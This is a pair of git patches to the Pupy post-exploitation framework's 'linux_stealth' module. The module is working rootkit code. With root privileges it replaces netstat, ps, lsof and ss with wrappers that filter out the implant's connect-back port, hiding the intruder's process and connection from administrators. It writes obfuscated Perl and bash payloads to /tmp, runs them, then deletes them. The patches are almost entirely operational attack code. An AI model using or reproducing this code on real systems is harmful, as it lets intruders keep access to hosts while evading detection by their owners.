From 649d91bb6043b221f405279550549bc4b0ccae42 Mon Sep 17 00:00:00 2001 From: j0eblack Date: Wed, 2 Mar 2016 00:49:00 -0500 Subject: [PATCH 1/2] improved linux_stealth and added Demo video --- pupy/modules/linux_stealth.py | 35 +++++--------- pupy/packages/linux/all/linux_stealth.py | 61 +++++++++++++----------- 2 files changed, 45 insertions(+), 51 deletions(-) diff --git a/pupy/modules/linux_stealth.py b/pupy/modules/linux_stealth.py index cad3d1e4..7716ffa0 100644 --- a/pupy/modules/linux_stealth.py +++ b/pupy/modules/linux_stealth.py @@ -2,30 +2,19 @@ from pupylib.PupyModule import * __class_name__="SetStealth" +def print_callback(data): + sys.stdout.write(data) + sys.stdout.flush() -@config(cat="manage", compat="unix") class SetStealth(PupyModule): - """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. + """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ - -********************** /!\ WARNING /!\ ********************** -* Do NOT run the stealh module more than ONCE on a machine. * -* Running it two times will brake the binaries. * -************************************************************* -NOTE: The pp.py script needs to be running with root privileges in order to run this module.""" - def init_argparse(self): - self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) - self.arg_parser.add_argument('port', type=int, help='The port number to which Pupy is connecting to.') +Demo: https://vimeo.com/157356150""" + def init_argparse(self): + self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) + self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.') - def is_compatible(self): - a,r=super(SetStealth, self).is_compatible() - if not a: - return False, r - if self.client.conn.modules['subprocess'].check_output(r"ls -l `dirname \`which netstat\``/net*tat | wc -l", shell=True).strip() == "2": - return False, "It looks like this module has already been run on this machine." - return True, "" - - def run(self, args): - self.client.load_package("linux_stealth") - self.client.conn.modules['linux_stealth'].run(str(args.port)) - self.success("Module executed successfully.") + def run(self, args): + self.client.load_package("linux_stealth") + self.client.conn.modules['linux_stealth'].run(args.port) + self.success("Module executed successfully.") diff --git a/pupy/packages/linux/all/linux_stealth.py b/pupy/packages/linux/all/linux_stealth.py index 94d04edd..c49546b6 100644 --- a/pupy/packages/linux/all/linux_stealth.py +++ b/pupy/packages/linux/all/linux_stealth.py @@ -1,36 +1,41 @@ #!/usr/bin/env python -import os +import sys import subprocess +import os import time -def cmd_exists(cmd): - return subprocess.call("type " + cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 def run(port): - if cmd_exists("gcc") == True: - bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" - #subprocess.call(bash, shell=True) - with open('/tmp/b', 'w') as f: - f.write(bash) - os.system("bash /tmp/b") - time.sleep(3) - os.remove("/tmp/b") - else: - bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" - with open("/tmp/p", "w") as f: - f.write(bash) - os.system("bash /tmp/p") - time.sleep(3) - os.remove("/tmp/p") - bashss="""#!/bin/bash + a=subprocess.check_output(["netstat", "-tn"]) + if port in a: + def cmd_exists(cmd): + return subprocess.call("type " + cmd, shell=True, + stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 + if cmd_exists("gcc") == True: + bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" + with open('/tmp/b', 'w') as f: + f.write(bash) + f.close() + os.system("bash /tmp/b") + time.sleep(3) + os.remove("/tmp/b") + else: + bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" + with open("/tmp/p", "w") as f: + f.write(bash) + f.close() + os.system("bash /tmp/p") + time.sleep(3) + os.remove("/tmp/p") + bashss="""#!/bin/bash /bin/zss $* | grep -v """+port - get_ss_path=subprocess.check_output('which ss', shell=True) - path=get_ss_path[:-3] - os.system("mv "+path+"ss "+path+"zss") - with open(path+"ss", "w") as newss: - newss.write(bashss) - os.system("chmod +x "+path+"ss") -#blazo - fresh orange -#brock - september 22nd -#Creds to: www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ + get_ss_path=subprocess.check_output('which ss', shell=True) + path=get_ss_path[:-3] + os.system("mv "+path+"ss "+path+"zss") + with open(path+"ss", "w") as newss: + newss.write(bashss) + newss.close() + os.system("chmod +x "+path+"ss") + else: + pass From 746b58c220a21b38e654948a0b9bd8cd1c7ab8ae Mon Sep 17 00:00:00 2001 From: n1nj4sec Date: Tue, 3 May 2016 18:07:05 +0200 Subject: [PATCH 2/2] linux stealth clean-up --- pupy/modules/linux_stealth.py | 23 ++++---- pupy/packages/linux/all/linux_stealth.py | 73 +++++++++++++----------- 2 files changed, 54 insertions(+), 42 deletions(-) diff --git a/pupy/modules/linux_stealth.py b/pupy/modules/linux_stealth.py index 7716ffa0..7033e44b 100644 --- a/pupy/modules/linux_stealth.py +++ b/pupy/modules/linux_stealth.py @@ -1,20 +1,23 @@ #!/usr/bin/env python from pupylib.PupyModule import * +from pupylib.utils.rpyc_utils import redirected_stdio __class_name__="SetStealth" def print_callback(data): - sys.stdout.write(data) - sys.stdout.flush() + sys.stdout.write(data) + sys.stdout.flush() +@config(compat="linux", cat="manage") class SetStealth(PupyModule): - """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Be careful when choosing the port. + """Hides the runnin process from netstat, ss, ps, lsof by using modified binaries. Credits to: http://www.jakoblell.com/blog/2014/05/07/hacking-contest-rootkit/ Demo: https://vimeo.com/157356150""" - def init_argparse(self): - self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) - self.arg_parser.add_argument('--port', help='The port number to which Pupy is connecting to.') + dependencies=["linux_stealth"] + def init_argparse(self): + self.arg_parser = PupyArgumentParser(prog="Linux Stealth Module", description=self.__doc__) + self.arg_parser.add_argument('--port', default=None, help='The port number to which Pupy is connecting to.') - def run(self, args): - self.client.load_package("linux_stealth") - self.client.conn.modules['linux_stealth'].run(args.port) - self.success("Module executed successfully.") + def run(self, args): + with redirected_stdio(self.client.conn): + self.client.conn.modules['linux_stealth'].run(args.port) + self.success("Module executed successfully.") diff --git a/pupy/packages/linux/all/linux_stealth.py b/pupy/packages/linux/all/linux_stealth.py index c49546b6..5fffa2bf 100644 --- a/pupy/packages/linux/all/linux_stealth.py +++ b/pupy/packages/linux/all/linux_stealth.py @@ -6,36 +6,45 @@ import os import time -def run(port): - a=subprocess.check_output(["netstat", "-tn"]) - if port in a: - def cmd_exists(cmd): - return subprocess.call("type " + cmd, shell=True, - stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 - if cmd_exists("gcc") == True: - bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" - with open('/tmp/b', 'w') as f: - f.write(bash) - f.close() - os.system("bash /tmp/b") - time.sleep(3) - os.remove("/tmp/b") - else: - bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" - with open("/tmp/p", "w") as f: - f.write(bash) - f.close() - os.system("bash /tmp/p") - time.sleep(3) - os.remove("/tmp/p") - bashss="""#!/bin/bash +def run(port=None): + if port is None: + try: + import pupy + host, port=pupy.get_connect_back_host().split(":") + except: + raise Exception("pupy connect back port couldn't be found, please precise it manually") + + print "hidding port %s ..."%port + + a=subprocess.check_output(["netstat", "-tn"]) + if port in a: + def cmd_exists(cmd): + return subprocess.call("type " + cmd, shell=True, + stdout=subprocess.PIPE, stderr=subprocess.PIPE) == 0 + if cmd_exists("gcc") == True: + bash=r"""which netstat ps lsof|perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,"|gcc -xc - -o$o";print F qq{int main(int a,char**b){char*c[999999]={"sh","-c","$_ \$*|grep -vE \\"""+'"'+port+"""|\$\$|[$s-$n]|grep\\\\""};memcpy(c+3,b,8*a);execv("/bin/sh",c);}}'""" + with open('/tmp/b', 'w') as f: + f.write(bash) + f.close() + os.system("bash /tmp/b") + time.sleep(3) + os.remove("/tmp/b") + else: + bash=r"""which netstat ps lsof |perl -pe'$s="\x{455}";$n="\x{578}";chop;$o=$_;s/([ltp])s/\1$s/||s/fin/fi$n/;rename$o,$_;open F,">$o";print F"#!/bin/sh\n$_ \$*|grep -vE \"[$s-$n]|grep|"""+port+"""\\\\"";chmod 493,$o'""" + with open("/tmp/p", "w") as f: + f.write(bash) + f.close() + os.system("bash /tmp/p") + time.sleep(3) + os.remove("/tmp/p") + bashss="""#!/bin/bash /bin/zss $* | grep -v """+port - get_ss_path=subprocess.check_output('which ss', shell=True) - path=get_ss_path[:-3] - os.system("mv "+path+"ss "+path+"zss") - with open(path+"ss", "w") as newss: - newss.write(bashss) - newss.close() - os.system("chmod +x "+path+"ss") - else: - pass + get_ss_path=subprocess.check_output('which ss', shell=True) + path=get_ss_path[:-3] + os.system("mv "+path+"ss "+path+"zss") + with open(path+"ss", "w") as newss: + newss.write(bashss) + newss.close() + os.system("chmod +x "+path+"ss") + else: + print "port is already hidden"